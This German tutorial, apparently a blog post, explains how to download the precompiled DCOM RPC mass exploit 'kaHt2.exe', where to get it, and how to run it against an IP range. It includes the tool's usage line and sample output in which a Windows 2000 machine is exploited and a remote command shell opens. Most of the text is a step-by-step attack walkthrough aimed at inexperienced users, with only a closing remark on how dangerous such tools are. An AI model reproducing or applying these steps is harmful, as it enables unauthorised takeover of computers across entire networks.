Ein Programmierfehler in Windows DCOM Schnittstelle ermöglicht einem Angreifer Ausführung von beliebigen Programmen auf einem entfernten Windows Rechner. Es existieren mittlerweile eine fülle von Exploits die es ermöglichen unerfahrenen Usern mit Minimum an Aufwand einen Windows Computer zukapern. Ich werde hier ein Exploit beschreiben den man schon in kompilierter Form herunterladen kann und ganze Netzwerke nach angreifbaren Rechner zu durchsuchen. Der Name des Exploits ist “kaHt2.exe“.
Den Exploit findet man auf der Seite Securityfocus.com.
http://www.securityfocus.com/bid/8205/exploit/
Nachdem man die Datei kaht2.zip herunter geladen und entpackt hat, muss man unter der Eingabeaufforderung das Programm starten.
_________________________________________________
KAHT II - MASSIVE RPC EXPLOIT
DCOM RPC exploit. Modified by aT4r@3wdesign.es
#haxorcitos && #localhost @Efnet Ownz you!!!
PUBLIC VERSION :P
________________________________________________
Usage: KaHt2.exe IP1 IP2 [THREADS] [AH]
example: KaHt2.exe 192.168.0.0 192.168.255.255
NEW!: Macros Available in shell enviroment!!
Type !! for more info into a shell.
Wie man unschwer erkennen kann, benötigt das Programm einen Netzwerkbereich als Eingabeparameter um zu starten.
kaht2 192.168.0.0 192.168.0.10
Ausgabe des Exploits.
_________________________________________________
KAHT II - MASSIVE RPC EXPLOIT
DCOM RPC exploit. Modified by aT4r@3wdesign.es
#haxorcitos && #localhost @Efnet Ownz you!!!
PUBLIC VERSION :P
________________________________________________
[+] Targets: 192.168.0.0-192.168.0.10 with 50 Threads
[+] Attacking Port: 135. Remote Shell at port: 41502
[+] Scan In Progress...
- Connecting to 192.168.0.1
Sending Exploit to a [Win2k] Server...
- Conectando con la Shell Remota...
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
C:\WINNT\system32>
Die letzte Zeile der Ausgabe ist schon auf dem entfernten Computer. Man kann jetzt beliebige Kommandos auf dem gekaperten System ausführen.
Das gefährlichste an dieser Art von Exploits ist dass die Benutzer von solchen keinerlei Kenntnisse benötigen. Sie müssen sich lediglich in der Eingabeaufforderung auskennen um mit dem System alles anzustellen was Ihnen in den Sinn kommt. Und durch die Eingabe eines Netzwerksbereichs ist es an der Benutzerfreundlichkeit nicht mehr zu übertreffen.
|